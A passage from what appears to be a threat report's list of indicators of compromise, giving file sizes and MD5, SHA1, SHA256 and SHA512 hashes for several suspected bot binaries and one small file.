SHA512: 5567998215fc9389efeb34ee57e59db4141044bbb1f06cac365565681226836b515c8c8cc17931e72e71d4240a5f433aebb8dfe67b2463ef800f59c86561a62c

6. Filesize: 158KB
MD5: d8e96e2fdd3c610ec19128e18de5abde
SHA1: 10cf691ae9779bfeca8b67e75721d0a6f275e4f9
SHA256: f09f8db2883da603f963189ef3b8185b179832de8b2e526ef63fe8b96847cc7b
SHA512: 979e0f29d7b65fcf7c4d93ec6fdaa70cdd26d9fa8a526fee7d4cdb028229db06186f89c9b0c93d3112e636c1b65819d46695310c90a1700343c2221df9323592

7. Filesize: 95KB
MD5: c20c610e14b8e59f5f8258a55fe7f27d
SHA1: e59a0b83d9882f2770f052a213cad25b0cbd53fc
SHA256: adb7828df990cedc9f301891e725c547656967d827ce9cfdf3f6e8fa8242618b
SHA512: dd8d992edcb5e4dae5e97a1ad12c28560a2cda02dcc1867250de78b0fe0d0f511b7269cb4999c80d6d299b87145bcef5b1587730b496426f14550b6f7a0a59a2

8. Filesize: 93KB
MD5: 8fad5e89ce3d2b6159ac2ce2fdf7c084
SHA1: 27105a304b9bb7cd8a663d1b4da1d92fd8eea355
SHA256: 24689f385c263c42a28dd1498049171abc633faf91b5df2a738a81145d929bd6
SHA512: 71689ade77c0ad2ca2db18ed4fd437b6a053b002efadbf6fb479e4f5c85a7830dc0e9cbfef877ca7a91c735a68f28226e7c813c05b329c23668de7edbc99f4bc

9. Filesize: 101KB
MD5: 8d0f8d45165dc1f3ba334ce75be39621
SHA1: 1d5baece9d5af3885276735c3c20d28e161e00ff
SHA256: 17441ed8bf165953a69907fb286dd47f2de3f94b744da25c889f86514b904791
SHA512: a8b032ce95f8a70b8c8c0b60b711d379706938c571bcb5cfd7fd16dac64c7d005987169abfd5d0d53b2e1da14eb1bd24cf913c7202f5855a9e4f0d80ce86f5e7

10. Filesize: 100KB
MD5: 3b78bb645b81d600c30713d416f666be
SHA1: 23796112f2cce2afb2217498b5ecf2801ab550f2
SHA256: d52f8bcb15a590aa5624c446091f1cd0705b68e4647debaeecf8cfa1fe425bd2
SHA512: 9532ede2d78f1f62f291c8d8d4023c9c579a0bdd042ca11af179adcab96ac2eb178ecb34b9e4b99a33f828694b9839abebabd2ef57dd36d1936027bad1987cf9

11. Filesize: 84KB
MD5: 64ece99ca4ab1c1405f5a3335d64a960
SHA1: b7395f2320a5bdadb78943b268708965cdbd1d74
SHA256: aaf14287d7a971d4541527262e85e5930bbb7f506cff4808d712843be9f05dae
SHA512: bc169075e50ceffd0ce0cc90513bc2f0d8696c01d4132609e31c782ea6c0a755505891e2e23676dd63c3dd00bf97599a9a7e6230e8c3f5166202f5b9be606d41

12. Filesize: 80KB
MD5: 22c527269cbd9b42f4ade79f52757efb
SHA1: c2456188a49af93b0d07af2a7cc1346d5be510bd
SHA256: 100042d7138b4348a13c54c191d501d125b7fea7631382e7d0e9d7251057ce97
SHA512: 7b7cb4d8307c0437163cdbfa349f1285cfa26c25ec856f8b4d4cebf8f71cae87e74de8f3c0f29ef2789168a4499bfe95007d7d524ed734e3eb4ac0d0e4e09b53

13. Filesize: 210B
MD5: 8897120dfe5dcdd7b607a48783da2c0d
SHA1: 2ac2cac253a33579a97e807e823246581a4f49dc
SHA256: 1fc4f41827142d8935c00a33739f5ab0ac61511528b85975f7d489c8c3fc79ae
SHA512: 4c6b10b995ebd0224b0e7d0e334554fc630676d4e0e07bfdd7524b424b73af2b56741f48b3e080c91cbde74fc4fb59f6c19d55ddc2f9ac46c731ab0235135ab1

The report does not map these hashes to the twelve /tmp file names; twelve entries are in the 80KB to 158KB range typical of statically linked bot binaries, and the 210-byte entry is a separate small file.